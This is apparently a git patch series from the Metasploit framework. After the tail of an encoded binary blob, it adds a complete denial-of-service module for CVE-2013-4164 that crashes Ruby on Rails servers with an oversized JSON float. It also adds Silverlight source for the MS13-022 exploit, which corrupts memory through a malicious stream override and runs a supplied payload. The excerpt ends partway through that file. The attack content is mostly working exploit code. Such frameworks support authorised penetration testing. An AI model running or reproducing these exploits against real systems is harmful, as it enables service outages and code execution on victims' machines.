zZFUnZF5D@zTHr)4US!0Rl?CLv_OokDk*c{haN+SxuvskUaQ;A2rjHL>jc>9zQtZ2p
z94|oULS=f=+veqIx7L}UvziIL={+`ZG*&VO0+qgd31Ux-o!A{%r|v282E4ve7i3^L
zp{(d3<Gac#@jC(8-5WE=Lr0}a+x(bQgDT~6mHH)5gH3n!x_?Y9KIqQq$kUV+!afPK
z6-gR+HXX~iwEaM9CY2?GVWuxF1a*-|%Oq4|_)q2J6cSkWC>y-j=N5>S{-BO8w9ptF
zBRjSv?PIJ2)OUItZ^&#v<<+V4OCQe<jje~pNRrVNl73n&Ht8P3^*cIUU;Bh_Rk)bA
zs^6WV+6ee;=7#fV<~XTiuu@I)7}-;Kn%S_P*-()Sq#KF2ziAuhYj12MY$p?X((ksv
zuOk|>_;j%3&oc0lRcMDR+7Up9oVQ;rJwM*)SIKG@%uQ+AJN|~`a%v})hB`L1$K#>D
zzBd4l@9U2C-cflHC-$0Tzwu)wi!jnLQxxROZ2F+F=AVob`izzBh)>ekm{6-(z&x<}
zKHZokaznUi(FyL}zZ=o0$Oq~J^-MV4_l{eH>sRr_xwu+lwO8bef++_Jj*w>c!@Ip7
zIVwolxgJ3}@*gRXqL&NRrO=+Fuj*S0R#S#ec<AT@#EN8}TW=ovl8s7g*2PF0Z=sq4
zLevK3&zdN}=C-<|MJVl@&pKPBEbdXOgkNs0UbZP&8a#-iEo%5LhtG$^%4wWzzbqrk
z2jlz(?Jd_VPQ?2=)P;5o#X!MXR6JtM0<mn-clV~>0Y#%%Xg3alcP*#xh=17(D3JYB
zH^oq{p+pTITEA|7`R<A8*Zbn=8ThKcSu6Qa(TPsp=N5MFAseXb3-W<?C&-q?^jVx3
z5ILT!CBIGPE~v9rPMOC&Z<R6^6Z?D~v7DzD*q+A$!~Ao6#R-EmA<DQFeeZ?AE)Ho8
zFHC>Mx^{icK7USuoQTrz5xfsD+<e1YJTvzyjPb6Je<&55fAFWU^EG5J73-0Lw|+V9
zX?v|R&bvcE`n&Vm=)xxd08@w3b~-eF>D+6E8{ow;Swj3y@xj@m9qV3`QhWnv81OFa
z@~jy5K_5^*8@N7Uj%^ZP5elqwG|6W`MqEK)eqV-5RA;oVqos~G_W{IIMZ7GovfDk?
zfdBm!?!4R#WyRKn#Fj*>^ZK2|!(GvOzo>R6ZVPY;=_Q8IA@B`FEr&jdweG|=k;g~&
zKq~%CjR?t4SK#CQ#4xt_esQj`ctd#Wp-X4>GE&xh;X2y=z#&3lOmR=(MA2D&Im4y^
zb8LB;r$4^)kE0JJZ4nMP-;%;*9V+zlC7XLZ(a+J^0Ziu4<8kX>uWBL_FwsDm-ie$h
zU@P;qL`9v)ny9skS(*kvPSfMu8kDK0Y?HI>P+SXw7cIB1g)y(=`+nL>DE7G_)z*Iz
zO(en{%#Oc}iFs4}?7MSh98Q{|&?WRYY(`n!z&q@>B_m5(=m(4Y&IwHd2GAC{bNx!A
z(2HvachC@-!vbEiqsY|Hq&ouE`uk^Pq`hA7M<!NgnFh0}e}#+{{l@uw%!>xqe=#(H
zHQ?#%%ZXtf6YY85ymV5pu#7vEQb;0^)>K1g?FMTFNS-Pl=?9Br>>GCj$^ybu%N5WU
z0kdMryi?kd(r6hDwPyYJdjIZ6Z#2Lp-DBl{aLVd2KdLP-<p?R&rm>1{L1S=P%yvTm
zjheIePtWwwtzL0C)TS~@6bEDm&>=jTfxp~U&0%59v|BN7(rhpZRRcA71+4p$4QF?L
z{Z5Z~X{wmRRYBcq_$TvgGQ<#6K66S2pNCj99hql8H{S6DMl#eMVN}4jRW@*r058UP
zj{Q9b<vG2x@cnCfC+wYZwv+sW5ImUST&uG(A-7c-tQrtPb4ve{D$!W_0eix;nof7G
zP(-X-&pN5&-~rL91}H+_2Y6Sme1N~SHtbz4L6jY_jK-a9FqfM2b&qLTdoR+aN$Vkh
zK6=^pEPys=b(0L~_+6`pz_G|juT@{=&ET3p>38dN*KWfi!-!{Pm#kA@Jm+`#VyA6o
zewqwa_g4Yp<P)QBpuI19zU!sKSHr&k;Idgo{q{V+kvpQ0Em$H2<J+OHx-I@=sp90@
zN8!p_Or}ak!&mFR?W<v=<ukCt*V&!dvmdVGZ{~a0=g$$HrhS#JDO**a)O7*nk0>1_
z^CdA)Vj-8t2z0p7C%m(da}I}|FGq7iNx<hMM!S`wnk1_mSh!G?R$G$fcYtX@C4vQJ
zOc8YMwX=*fn;fN8W{oa@x0D`%V9qLOWwDI6dA&q5Um1D5c)g^Z>s++c?mK2N%Hkv8
zCIlf14#tNN^X`@5oPYBOUMVQ1l#I}JtODaOpK^2MFI6Yy3;JI?$>Kc0P8Ik8#C3VY
zKq+-m00fS0N~?3_K)aLq#dm?g#$bqnbx(Mc?mJtt@>iR*w!3B-5a2~oy&3qBa+x}f
z5#!-uG*)z1nx*lU(w?(g`kEb*<v44<Et34Cc%e@*U)Z&-<ZW*dx3-|T+{a^sSuWvQ
zoDC_TJ&z!r^>KM%ALf7i@eB$S^Nk_C2>H{VMM}Tx#i_u+FYoS-lBOz>D!Fxk-AX?4
z^_5U%$IXY+TL)m}UfVbjc5@f^a=z<MO~!XR9B&R&d9dd8&YaqD*8~t*txvj6MN8nQ
z@f|p`Ce?}PbeW!&*6uD^tO&bPqh{iI^t%33*l8|G(I1R7=oIzuOgG%0Pc&4pTZm?+
zb5-pgx+dkOzqubYQ=VYAbZDOQbC;YTv~uj_MtAEb6b(o$Fq_Z0`h^{J<U*`M?;2+F
zDKwHQeKv~w8$&`S-dhuUd~^bb$b<~1l~qkIW(N|1)h_GwE<c{SBe4nbTocl^OTs7J
z>zEg>NLGuP#4uJ`Q$dP(s`Mo+%ULTSj00OTIcZ`t)ep4aSTl}tX!@DCr%e67+K122
z&_yq+*9f}t$3@X97>|BN2YncD>&?c>O)Ave{_zPf=E8z(fXq)*xLAFwRle_vJnE>K
z14<QoO_~?{o91zF)~|0cmpm`wK$AP_If`whB}6ls&9>{hZjN;L@PJ<(09zc(?%evh
zPN*6zP$QW9sc%xvkwXrRTjlG_9|pS?ES31UNQ$YMhri31*h0q`oi5RI&cEl}kX6!6
z&NxS}5CqaM3$QDLeu<iUen7XV_4y{)%pEsKdqZuWDO_f4ZY4Qw??EfuuWSbDiZrSe
zObRQ2XagftelwUg*MH_zqN6AS0#$y?{}beOKND|AK^{yeospMB%Y%_e`ytZG6Q7>r
z2av~a$@S!Wfp!g2EiKz7)Wwx0bz>OxxwW=5X-d5{++_f^(Q#QwN{!85I%UYYRY)x<
zHv?bBdJrX*Xbyc|g!(Z4+)|L#xV1Az7AelGsRG+j-kw`Rtz-c${f$B6<ic-IteJ+e
zK%`8Z&2J_-xp+ab2Jv`Uf!8S2Fq-^A+mpG524P!@g}Xv#&TXv7$?4h#A5T)6l7;OV
z3Bcv4u&|)zc(Chh^(e=${(bh2YLSr@elK=0<}i{`o;s6M1Edr=Bf*Bc+ek5vP!1AU
zbx*Xc+oWBJOE$v%uP^G+=9V?u*%D-Af~oB$=?k{rfvCS7AhvQh_Q?<-);t<BSllYd
zDN_Lc4-5behHx=`%5Z5SbF@L#DxL(CzZ*wVlzpHoaxfgvb9Y67t80N}limm`+)i9{
z!9q3KOppcDbkqcq+`!DcRM;eSigp`2ydHqx(PnP74c{xPK~%a!i{InJnksK~XT0oR
z1uZS~G-+x(+dMb%-RP7DKb=;z=iI)=Wf+PeBO_y;uC95csLCXuJ@%^07Ji9Fl#L?X
zZZ#_rCOSGQ7)#UeaUB2U$#UztHB(#KCY1Fsk3p3the>yBu{w-2&~5Dv_Qw(OEHljw
z?O{*uVa|{ca}6-Fj~wx{xwD#ri~7U%S((Ogu=Ux8-*oZin>E_Jp&d<^^1#5Aef+et
z?45aGV&0E}IO0gFn^#f&*KA=g$f-^}*&%<)0M1nOlx8A5KC$wy`qW4B7DI9fge-9b
z>p&o_(`w*TgpWG8I{w$A>f(Bvi)%~UFZ1T>dcVi@qN7Yf+l}yfJ=$$idd1`!d}ZIc
zn_}hri>v7NVBtS(;KXb##ZC&$i&O|f^B0rkTs0^}04arCmc2Xkcy3Uk+tR5U^IW9M
zy}e?<G(I2d;4s7`k&P^=e$_$-)TD!fcFGKIfoN=%Y@^p8_v2^WY~F$JnBKmFg~7sv
zkY`UVnN=4l?^6Er3*LmTA`Xk`4gF{0H5t>*mQ^`%(^LiQZ#fCs6JK%JRTq)p2?}&y
z?z2TE$ivqYs5xzCX6p{_ic`cA{8SE;ki+nlx*u8zsvU@ueiDQX={>I%g?;A=si6wU
zr&_UH5Hu3wC8G_-^=NH0)kDsRRVQuVh}K^30?-&VJ+GK}Q0SkMhdLgU=X{YHs2)lQ
zmHxPgK^&41>_vo^#g<DaSyzniy4D-Z!V);VN3=Bz-}9x!@#Mp?X+#&?aisp9$8)kf
z3h7TT1)+iDEmMP*IuXYK!7t@mw5MO@ox@uGa_Y^8FvQx$7l9^|N%PFz<++{z<Vo{c
zZ4OZHE{(7=5bUZrd~(*icJ=)zJ`<fHB?iXJZ)N~PRXTd2w`qG33_O1Jo`G^;lhKhj
zN&HTGgdq~9XDk>E*aUXE7lT85QBC8m*c-=97U?KV4!mI1vhlDnqRoOR7o&Z1LRr<?
zRqrWobL$h^p_L{J(HVh}_{mj?>-mj>475#EMWnRoqO+<SSL0sbvN4d<FrI_2er6dg
zd`QPmrwaG;z{fx_#O->yy4Bx67Q%WWFOPX4Kd#86d|{<MjIzbhkZGyDy%KLhJktBw
zxAqeOnSkky1u~h7MTLXs?m|5@xq>hJ!-UF!jgI0%)L@RW^|-({Fx1q3u92kZ@>isx
z6zA^yQ>0T(0rX#5J()M-QV6-~wy3<J?cHCKk-8!-^i!lVLfk&4K+}p$AJVa?GNJpQ
z>Bb0?q^7g<X_>5#h4()W$4FbQ=v~@H7q8hJ`M7yoj_3&^FxjiI#AH*2S&v8C%nu(r
z&~VoFeg-`#>xlA!1}VyIhZ0G*BbD@%QwO>d@R(XrnJG5NCRO#zNmau<Go~T)O}hau
z*N5%(=9i@kOz3D$)|CWjmMz{lRX!q&0ineVLNvH;ORYt-x;J*w%tF&;A|3F{JRW_i
zGuuuT{FwZI`X%P#z#x??SAhBbNMrA1P}YdQ>&zo2_~>42{W+87Kp6%DKayX*K;Is2
zD@7hCAg2SDIX0$R#cY-Jj_C8{OE}tzmsVODhI&7cfo&xZt)`I5uAQsqufUz@;l{vI
zU_E8{%5%0>a$~8brK39TyBj!5Q6!0|S<26CyXwwp-QOl_X3&?&nm{|t1H2@{lc#sS
zYDafmF&$l)py~sJ893A~N+7a~jM{q>EOAT3oDl<E<2)CHiq?^qHCQ=whbtaB>aR5Q
z>yRPWMKf=#;Uze*A>alp$@rm&{^R{Gw#emy;Yz>hBdvEMJ(2;Ws!84-wk@lG`>q_)
zDTrCqgCU$xn#TK=-2$iY*;X0R486ydR?nHhM-nE)hayIE3u?xa<b)5=F>J3F@!Qjq
z*kXhd9}FKjs(5=j)DYBuI65=&@RS_>EO#(F2m20<A&t~YMldF#2G}ldR;QPRvYn3~
zp-OfDFBH<wP;?vBJ%1DPcUy{Hw6+`hN%b(e103=iTU-A;lY<{blF&tsQ!E16eqjb-
z*>7f6pd@<LXIJ{QRkk8YyEjlMJJyXNM+9U|oZZ~}2h^RqoEE@c{+j6w#hNcgCr9}{
zAa`z||2GqaaVE0%iDh*ve-FWO^W&!aNbCBgFDM(mtTZP;Er)pEj%E3BqYGM<m#35y
zR)ZdL75w7&J?2yXxRcFwxdy|g*JEVBruCd9>O;(ahqN@Vc2ULo`IqNwnk`AgrovJZ
z^%dOZRjxKW;9CWm(8^89`r3*AMat>z8nnf;&hso9bn^G`?Brl&380x9+qm)=P8kQN
z?idRVx`9s11`LVhXkYN@I~%YGlmGs`Q#k!V|M0LeS95OooYBG6RHY!sAu7CnNf4IR
z@#6P5+4Ifw#aC{e_Cfb$GPBn2d?K^Wn<^C}E8M8nO`^jKq%)B@L6lNke5~x-K$uY5
z=gc3`fBn3KBRI~fyC!iu*jpI(dfu@86e4%kabUP}6$igD8*7R|pYUw6;UijkbjcYg
zR_T;;{_e4H!s#e)(9`2vnK2eyo|~vgxx~a9$m^0+edglHHY)<`;EHNDiM#nhyUHcK
zFWQ`*FXV|skYVGL>QU*AsZ!S`(NfUK^|`{gZz9)Lr%BZmohyf)3Th$>yTHg0OOyE~
zc?)ZW$P11a&%<U;1zxA){KxBV8B2N4(Ez}$N=zm`vp}H^W0D%rWP5WImhfTKATc>h
zWYb}c<yem_u<zK0(9jBDa#Ew070YA8JZtjjThY+xFU1pryDinBe;Ezzoya;28$E4X
z3%A=8rbg<I-3P<EiFK`uF)mw~Qt%WU9gt4A(O@QeKky6WoXZ`-zkN2f8rPD0wpU#A
zSxujko%A1pw=R%gcV*_j>d-Bmj#`Qef)UZMJ=f+WY(t_6LuxL{C)#x`)sZFE=K|Na
z32=Ye*_6NOM8{abn^?drrkc__csRKK{afIlb^hPt|NkBM@7w>A>;8XNZ~vA5uLrND
TgoyN?IsCu$`G?Gu|LOh<?_!HH

literal 0
HcmV?d00001


From 6a28aa298e8e607f9b9be77afb179f67882aee4a Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Fri, 22 Nov 2013 16:51:02 -0600
Subject: [PATCH 068/217] Module for CVE-2013-4164

So far, just a DoS. So far, just tested on recent Rails with Webrick and
Thin front ends -- would love to see some testing on ngix/apache with
passenger/mod_rails but I don't have it set up at the moment.
---
 .../dos/http/rails_json_float_dos.rb          | 125 ++++++++++++++++++
 1 file changed, 125 insertions(+)
 create mode 100644 modules/auxiliary/dos/http/rails_json_float_dos.rb

diff --git a/modules/auxiliary/dos/http/rails_json_float_dos.rb b/modules/auxiliary/dos/http/rails_json_float_dos.rb
new file mode 100644
index 0000000000..24789e0da1
--- /dev/null
+++ b/modules/auxiliary/dos/http/rails_json_float_dos.rb
@@ -0,0 +1,125 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Dos
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Ruby on Rails JSON Processor Floating Point Heap Overflow DoS',
+      'Description'    => %q{
+        When Ruby attempts to convert a string representation of a large floating point
+        decimal number to its floating point equivalent, a heap-based buffer overflow
+        can be triggered. This module has been tested successfully on a Ruby on Rails application
+        using Ruby version 1.9.3-p448 with WebRick and Thin web servers, where the Rails application
+        crashes with a segfault error. Other versions of Ruby are reported to be affected.
+      },
+      'Author'         =>
+        [
+          'Charlie Somerville', # original discoverer
+          'joev', # bash PoC
+          'todb', # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2013-4164' ],
+          [ 'OSVDB', '100113' ],
+          [ 'URL', 'https://www.ruby-lang.org/en/news/2013/11/22/ruby-1-9-3-p484-is-released/' ]
+        ],
+      'DisclosureDate' => 'Nov 22 2013'))
+    register_options(
+      [
+        OptString.new('TARGETURI', [false, 'The URL of the vulnerable Rails application', '/'])
+      ], self.class)
+  end
+
+  def uri
+    normalize_uri(target_uri.path.to_s)
+  end
+
+  def digit_pattern
+    @digit_pattern ||= rand(10_000).to_s
+  end
+
+  def integer_part
+    digit_pattern
+  end
+
+  def multiplier
+    (500_000 * (1.0/digit_pattern.size)).to_i
+  end
+
+  def fractional_part
+    digit_pattern * multiplier
+  end
+
+  # The evil_float seems to require some repeating element. Maybe
+  # it's just superstition, but straight up 300_002-lenth random
+  # numbers don't appear to trigger the vulnerability. Also, these are
+  # easier to produce, and slightly better than the static "1.1111..."
+  # for 300,000 decimal places.
+  def evil_float_string
+    [integer_part,fractional_part].join('.')
+  end
+
+  def run
+    print_status "#{peer} - Using digit pattern of #{digit_pattern} taken to #{multiplier} places"
+    sploit = '['
+    sploit << evil_float_string
+    sploit << ']'
+    print_status "#{peer} - Sending DoS HTTP#{datastore['SSL'] ? 'S' : ''} request to #{uri}"
+    target_available = true
+
+    begin
+      res = send_request_cgi(
+        {
+          'method'  => 'POST',
+          'uri'     => uri,
+          'ctype'   => "application/json",
+          'data'    => sploit
+        })
+    rescue ::Rex::ConnectionRefused
+      print_error "#{peer} - Unable to connect. (Connection refused)"
+      target_available = false
+    rescue ::Rex::HostUnreachable
+      print_error "#{peer} - Unable to connect. (Host unreachable)"
+      target_available = false
+    rescue ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
+      print_error "#{peer} - Unable to connect. (Timeout)"
+      target_available = false
+    end
+
+    return unless target_available
+
+    print_status "#{peer} - Checking availability"
+    begin
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => uri,
+        'ctype' => "application/json",
+        'data' => Rex::Text.rand_text_alpha(1+rand(64)).to_json
+      })
+      if res and res.body and res.body.size > 0
+        target_available = true
+      else
+        print_good "#{peer}#{uri} - DoS appears successful (No useful response from host)"
+        target_available = false
+      end
+    rescue ::Rex::ConnectionError, ::Timeout::Error, ::Errno::EPIPE, Errno::ECONNRESET
+      print_good "#{peer} - DoS appears successful (Host unreachable)"
+      target_available = false
+    end
+
+    return unless target_available
+
+    print_status "#{peer} - Target is still responsive, DoS was unsuccessful."
+
+  end
+end

From 288a1080db50f871d3bad816b4633eaac4261d75 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 22 Nov 2013 16:53:06 -0600
Subject: [PATCH 069/217] Add MS13-022 Silverlight app code

---
 .../source/exploits/cve-2013-0074/.gitignore  |  12 +
 .../exploits/cve-2013-0074/SilverApp1.sln     |  20 +
 .../cve-2013-0074/SilverApp1/App.xaml         |   8 +
 .../cve-2013-0074/SilverApp1/App.xaml.cs      |  65 ++
 .../cve-2013-0074/SilverApp1/MainPage.xaml    |  14 +
 .../cve-2013-0074/SilverApp1/MainPage.xaml.cs | 572 ++++++++++++++++++
 .../SilverApp1/Properties/AppManifest.xml     |   6 +
 .../SilverApp1/Properties/AssemblyInfo.cs     |  35 ++
 .../SilverApp1/SilverApp1.csproj              | 107 ++++
 9 files changed, 839 insertions(+)
 create mode 100755 external/source/exploits/cve-2013-0074/.gitignore
 create mode 100755 external/source/exploits/cve-2013-0074/SilverApp1.sln
 create mode 100755 external/source/exploits/cve-2013-0074/SilverApp1/App.xaml
 create mode 100755 external/source/exploits/cve-2013-0074/SilverApp1/App.xaml.cs
 create mode 100755 external/source/exploits/cve-2013-0074/SilverApp1/MainPage.xaml
 create mode 100755 external/source/exploits/cve-2013-0074/SilverApp1/MainPage.xaml.cs
 create mode 100755 external/source/exploits/cve-2013-0074/SilverApp1/Properties/AppManifest.xml
 create mode 100755 external/source/exploits/cve-2013-0074/SilverApp1/Properties/AssemblyInfo.cs
 create mode 100755 external/source/exploits/cve-2013-0074/SilverApp1/SilverApp1.csproj

diff --git a/external/source/exploits/cve-2013-0074/.gitignore b/external/source/exploits/cve-2013-0074/.gitignore
new file mode 100755
index 0000000000..653f65a11e
--- /dev/null
+++ b/external/source/exploits/cve-2013-0074/.gitignore
@@ -0,0 +1,12 @@
+SilverApp1/Release/
+SilverApp1/Debug/
+SilverApp1/Bin/Release/
+SilverApp1/Bin/Debug/
+SilverApp1/obj/Release/
+SilverApp1/obj/Debug/
+SilverApp1/SilverApp1.csproj.user
+SilverApp1.ncb
+SilverApp1.suo
+SilverApp1.sdf
+SilverApp1.opensdf
+SilverApp1.v11.suo
diff --git a/external/source/exploits/cve-2013-0074/SilverApp1.sln b/external/source/exploits/cve-2013-0074/SilverApp1.sln
new file mode 100755
index 0000000000..79680f0e2b
--- /dev/null
+++ b/external/source/exploits/cve-2013-0074/SilverApp1.sln
@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 11.00
+# Visual Studio 2010
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SilverApp1", "SilverApp1\SilverApp1.csproj", "{D33B3660-E6CA-4B29-9E09-0DF99B28840E}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{D33B3660-E6CA-4B29-9E09-0DF99B28840E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{D33B3660-E6CA-4B29-9E09-0DF99B28840E}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{D33B3660-E6CA-4B29-9E09-0DF99B28840E}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{D33B3660-E6CA-4B29-9E09-0DF99B28840E}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
diff --git a/external/source/exploits/cve-2013-0074/SilverApp1/App.xaml b/external/source/exploits/cve-2013-0074/SilverApp1/App.xaml
new file mode 100755
index 0000000000..8c7b18d4b2
--- /dev/null
+++ b/external/source/exploits/cve-2013-0074/SilverApp1/App.xaml
@@ -0,0 +1,8 @@
+<Application xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
+             xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" 
+             x:Class="SilverApp1.App"
+             >
+    <Application.Resources>
+        
+    </Application.Resources>
+</Application>
diff --git a/external/source/exploits/cve-2013-0074/SilverApp1/App.xaml.cs b/external/source/exploits/cve-2013-0074/SilverApp1/App.xaml.cs
new file mode 100755
index 0000000000..fcabe72f15
--- /dev/null
+++ b/external/source/exploits/cve-2013-0074/SilverApp1/App.xaml.cs
@@ -0,0 +1,65 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Net;
+using System.Windows;
+using System.Windows.Controls;
+using System.Windows.Documents;
+using System.Windows.Input;
+using System.Windows.Media;
+using System.Windows.Media.Animation;
+using System.Windows.Shapes;
+
+namespace SilverApp1
+{
+	public partial class App : Application
+	{
+
+		public App()
+		{
+			this.Startup += this.Application_Startup;
+			this.Exit += this.Application_Exit;
+			this.UnhandledException += this.Application_UnhandledException;
+
+			InitializeComponent();
+		}
+
+		private void Application_Startup(object sender, StartupEventArgs e)
+		{
+            this.RootVisual = new MainPage(e.InitParams);
+		}
+
+		private void Application_Exit(object sender, EventArgs e)
+		{
+
+		}
+
+		private void Application_UnhandledException(object sender, ApplicationUnhandledExceptionEventArgs e)
+		{
+			// If the app is running outside of the debugger then report the exception using
+			// the browser's exception mechanism. On IE this will display it a yellow alert 
+			// icon in the status bar and Firefox will display a script error.
+			if (!System.Diagnostics.Debugger.IsAttached) {
+
+				// NOTE: This will allow the application to continue running after an exception has been thrown
+				// but not handled. 
+				// For production applications this error handling should be replaced with something that will 
+				// report the error to the website and stop the application.
+				e.Handled = true;
+				Deployment.Current.Dispatcher.BeginInvoke(delegate { ReportErrorToDOM(e); });
+			}
+		}
+
+		private void ReportErrorToDOM(ApplicationUnhandledExceptionEventArgs e)
+		{
+			try {
+				string errorMsg = e.ExceptionObject.Message + e.ExceptionObject.StackTrace;
+				errorMsg = errorMsg.Replace('"', '\'').Replace("\r\n", @"\n");
+
+				System.Windows.Browser.HtmlPage.Window.Eval("throw new Error(\"Unhandled Error in Silverlight Application " + errorMsg + "\");");
+			}
+			catch (Exception) {
+			}
+		}
+	}
+}
diff --git a/external/source/exploits/cve-2013-0074/SilverApp1/MainPage.xaml b/external/source/exploits/cve-2013-0074/SilverApp1/MainPage.xaml
new file mode 100755
index 0000000000..09ba4ecbdb
--- /dev/null
+++ b/external/source/exploits/cve-2013-0074/SilverApp1/MainPage.xaml
@@ -0,0 +1,14 @@
+<UserControl x:Class="SilverApp1.MainPage"
+    xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
+    xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
+    xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
+    xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
+    mc:Ignorable="d"
+    d:DesignHeight="400" d:DesignWidth="600" xmlns:sdk="http://schemas.microsoft.com/winfx/2006/xaml/presentation/sdk" Width="Auto" Height="Auto">
+
+    <Grid x:Name="LayoutRoot" Background="White" Height="400" Width="600">
+        <Button Content="Run calc.exe" Height="23" HorizontalAlignment="Right" Margin="0,367,241,0" Name="btnClickMe" VerticalAlignment="Top" Width="119" Click="btnClickMe_Click" />
+        <RichTextBox HorizontalAlignment="Left" Margin="12,32,0,0" Name="richTxtBox" VerticalAlignment="Top" Height="330" Width="576" TextWrapping="NoWrap" HorizontalScrollBarVisibility="Auto" />
+        <TextBlock Height="23" HorizontalAlignment="Right" Margin="0,4,12,0" Name="textBlock1" Text="Silverlight Application" VerticalAlignment="Top" Width="576" Foreground="Navy" FontSize="14" TextAlignment="Center" />
+    </Grid>
+</UserControl>
diff --git a/external/source/exploits/cve-2013-0074/SilverApp1/MainPage.xaml.cs b/external/source/exploits/cve-2013-0074/SilverApp1/MainPage.xaml.cs
new file mode 100755
index 0000000000..89390ca96d
--- /dev/null
+++ b/external/source/exploits/cve-2013-0074/SilverApp1/MainPage.xaml.cs
@@ -0,0 +1,572 @@
+using System;
+using System.Windows;
+using System.Windows.Controls;
+using System.Windows.Documents;
+using System.IO;
+using System.Windows.Media.Imaging;
+using System.Resources;
+
+
+namespace SilverApp1
+{
+    // declare custom MemoryStream w/ malicious Read()
+    public class   
+         MyStream : MemoryStream
+    {    
+        // raw PNG image data w/o PLTE chunk data // not the shellcode :)
+        static byte[] pngStart = {
+			0x89,0x50,0x4E,0x47,0x0D,0x0A,0x1A,0x0A, // PNG header 
+			0,0,0,0x0D,0x49,0x48,0x44,0x52,0,0,0,0x08,0,0,0,0x04,0x08,0x03,0,0,0,0x84,0x13,0x8E,0xC2, // IHDR chunk
+			0,0,0x03,0,0x50,0x4C,0x54,0x45 // PLTE chunk header
+		};
+		static byte[] pngEnd = {
+            0,0,0,0, // PLTE chunk checksum can be 0      
+			0,0,0,0x2F,0x49,0x44,0x41,0x54,0x78,0xDA,0x01,0x24,0,0xDB,0xFF,0,0,0x01,0x02,0x03,0x04,0x05,0x06,0x07,0,0x08,0x09,0x0A,0x0B,0x0C,0x0D,
+			0x0E,0x0F,0,0x10,0x11,0x12,0x13,0x14,0x15,0x16,0x17,0,0x18,0x19,0x1A,0x1B,0x1C,0x1D,0x1E,0x1F,0x17,0x1C,0x01,0xF1,0x7D,0xBE,0xC7,0x66, // IDAT chunk
+			0,0,0,0,0x49,0x45,0x4E,0x44,0xAE,0x42,0x60,0x82 // IEND chunk
+        };
+        
+        Object[] obj;
+        public byte[] png;
+		public int offs;
+
+        // create Stream basing on pngStart[]
+        public MyStream() : base(pngStart)
+        {
+        }
+
+        int ReadBuf(byte[] buffer, int offset, int count)
+        {         
+            // calc true PNG image length
+			int res = pngStart.Length + 0x300 + pngEnd.Length;
+			
+			base.Read(buffer, offset, count); // (count = buffer.Length) < res
+            MainPage.LogAdd("MyStream.Read(["+buffer.Length+"],"+offset+","+count+") = " + res);
+            return res;
+        }
+
+        // override Read()
+        public override int Read(byte[] buffer, int offset, int count)
+        {
+            // allocate arrays sequentially in memory
+            int len = pngEnd.Length;
+			obj = new object[] { null, null };	// as PLTE data
+            png = new byte[0x300 + len - offs]; // as rest PNG data
+            MainPage.buf = new uint[3];			// the target array for memory corruption
+            MainPage.obj = new object[3];		// aux array
+
+            // copy the trail PNG data		
+            Array.Copy(pngEnd, 0, png, png.Length-len, len);
+
+            // save pointers in PLTE data
+            obj[0] = png;
+            obj[1] = MainPage.buf;
+
+            // return "bytes read" > "count" to trigger the memory disclosure
+            return ReadBuf(buffer, offset, count);
+        }
+    }
+
+    // declare descendant for System.Windows.Browser.ScriptObject to access vulnerable protected Initialize()
+    public class MyObject : System.Windows.Browser.HtmlObject
+    {
+        public MyObject()
+            : base()
+        {
+        }
+
+        // access protected Initialize()
+        public void Init(IntPtr handle)
+        {
+			MainPage.LogAdd("ScriptObject.Initialize(" + MainPage.Hex((ulong)handle) + ", 1, true, false)");
+			Initialize(handle, (IntPtr)1, true, false); // call agcore.dll DOM_ReferenceObject()
+        }
+    }
+
+
+	public partial class MainPage : UserControl
+	{
+		public static RichTextBox tbox;
+		public static uint[] buf;
+		public static ulong bufAddr;
+		public static object[] obj;
+		public static bool is64;
+		public static Version vsn;
+        public static byte[] payload;
+
+        public MainPage(System.Collections.Generic.IDictionary<string, string> iDictionary)
+        {
+#if DEBUG
+            InitializeComponent();
+			tbox = richTxtBox;
+#endif
+            // print environment info
+			vsn = Environment.Version;
+			LogAdd("Silverlight: " + vsn.ToString() + "\n" + "OS: " + Environment.OSVersion.ToString());
+            payload = Convert.FromBase64String(iDictionary["payload"]);
+            LogAdd(String.Format("Payload decoded length: {0}", payload.Length));
+#if !DEBUG
+            //TODO: First try doesn't overwritte Payload(), need to dig why, should...
+            exploit(); 
+            exploit();
+#endif
+        }
+
+		// prints message into richTextBox
+		public static void LogAdd(string txt)
+		{
+#if DEBUG
+			Paragraph p = new Paragraph();
+			p.Inlines.Add(txt);
+			tbox.Blocks.Add(p);	
+#endif
+		}
+
+        public static void LogAdd(object obj)
+        {
+#if DEBUG
+            LogAdd(obj == null ? "null" : obj.ToString());
+#endif
+        }
+
+		// converts int to hex string
+		public static string Hex(int u)
+		{
+			return u <= 9 ? u.ToString() : "0x" + u.ToString("X");
+		}
+
+		public static string Hex(ulong u)
+		{
+			return u <= 9 ? u.ToString() : "0x" + u.ToString("X");
+		}
+
+        // reads pointer from byte[]
+        public static ulong ReadAddr(byte[] b, int offs)
+        {
+            ulong u = 0;
